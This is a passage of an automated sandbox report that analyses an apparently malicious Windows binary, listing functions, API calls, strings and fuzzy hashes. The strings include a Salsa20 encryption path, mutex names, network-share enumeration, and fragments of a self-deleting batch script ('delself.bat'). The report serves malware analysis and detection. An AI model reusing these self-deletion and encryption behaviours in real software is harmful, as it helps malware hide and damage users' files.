                                                                                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004169DF
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 120817956-0
                                                                                                                                                                                                                                        • Opcode ID: a401f52fc995c05b336c7c18f0329bcfba5717e2edcc6a413f02a146fdcf07fe
                                                                                                                                                                                                                                        • Instruction ID: aa06b8048d3bf760f527e7d0bbb9ad0a08af858ba63749c6f8d7f01112261dfe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a401f52fc995c05b336c7c18f0329bcfba5717e2edcc6a413f02a146fdcf07fe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E731E3B2A006059BCB20DF68C5816AEB7F9EF45750F21823FE856D7740DB38DD448BA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041FA10 Relevance: 1.5, APIs: 1, Instructions: 19threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 0041FA25
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                                                                                        • Opcode ID: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                                                                                                                                                                                                                                        • Instruction ID: 74150d4eedde67828055b261a2b9f98274f0c47e32cd20f87c2cefabb50f2d8a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1D05E322883147BE3140A9AAC06F867AC88B15B20F00403AB609DA1C0D9A1A8108A9C
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041FD80 Relevance: 1.5, APIs: 1, Instructions: 18windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00410BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 0041FDA4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnumMessageOpenSend
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1835186980-0
                                                                                                                                                                                                                                        • Opcode ID: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                                                                                                                                                                                                                                        • Instruction ID: f1b321f5059a27c682919cb5e20fd2d447803ac3e15b06371c74c2023cac73f2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27E02B311043406AD32097A4DC01F82BBC49F18728F00C81EF7CA6B9C1C5F1B04487ED
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041FDC0 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00529230), ref: 0041FDD6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                                                                                        • Opcode ID: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                                                                                                                                                                                                                                        • Instruction ID: 36d07be7825d0dd215c2e58fd0e5fada4a3bc662417c17551b787912ef620d2a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6FD012753C9305B7E7180BA6BC47F593A989B29B00F504036F60DD92D0DAB1F4509A5C
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004220B6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __fsopen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3646066109-0
                                                                                                                                                                                                                                        • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                                                                                                        • Instruction ID: 292279633ce522dfb3aa62ab9f23dea9a591004ce3b356b458beb681742a1975
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDB0927254021C77CF012E82EC02A493B199B60764F448021FB1C181B1E6BBE66496C9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00420FDD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __wfsopen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 197181222-0
                                                                                                                                                                                                                                        • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                                                                                                        • Instruction ID: 060863096896a5b816ca94ba1531ddaea04f54b188c1fa908ac11e743c0bd32b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1EB0927254020C77CE012A82EC02A497B199B516A4F408021FB0C18571A677A6A09A89
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00412900 Relevance: 1.3, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,?,?), ref: 00412966
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                                                                                                        • Opcode ID: 067589113ee3e2bc80d74314a0e77475e644bbe21b622bdff0d573772f9c0a66
                                                                                                                                                                                                                                        • Instruction ID: 3b43283c781d39060a285e1a990033b4cd03b7dd602a36c1420ec248ee7b7319
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067589113ee3e2bc80d74314a0e77475e644bbe21b622bdff0d573772f9c0a66
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0411B171A00219EBDF00DF59DC41BDFBBA8EF05718F00452AF819A7280D7BE99558BDA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _wcscmp.LIBCMT ref: 004382B9
                                                                                                                                                                                                                                        • _wcscmp.LIBCMT ref: 004382CA
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                        • API String ID: 1351282208-711371036
                                                                                                                                                                                                                                        • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                                                                                                        • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                                                                                                                                                        • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __wassert
                                                                                                                                                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                                                                                                                                                        • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                                                        • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00412539
                                                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041255B
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                                                                                        • API String ID: 2372642624-488272950
                                                                                                                                                                                                                                        • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                                                                                                        • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00411915
                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 004119B8
                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                                                                                                                                                          • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                                                                                                        • String ID: failed with error
                                                                                                                                                                                                                                        • API String ID: 4182478520-946485432
                                                                                                                                                                                                                                        • Opcode ID: 026a8ed3bdaea1c9a44133b8e41068491a8e55accbc0c87c52e748ca9719700f
                                                                                                                                                                                                                                        • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 026a8ed3bdaea1c9a44133b8e41068491a8e55accbc0c87c52e748ca9719700f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                                                                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00482450
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                                                                                                                        • API String ID: 151064509-1805842116
                                                                                                                                                                                                                                        • Opcode ID: af425f0bdac543ca25f1fae7ff2a53bf1cfa0fd4ab80a64cc2dce097e2973e2e
                                                                                                                                                                                                                                        • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af425f0bdac543ca25f1fae7ff2a53bf1cfa0fd4ab80a64cc2dce097e2973e2e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
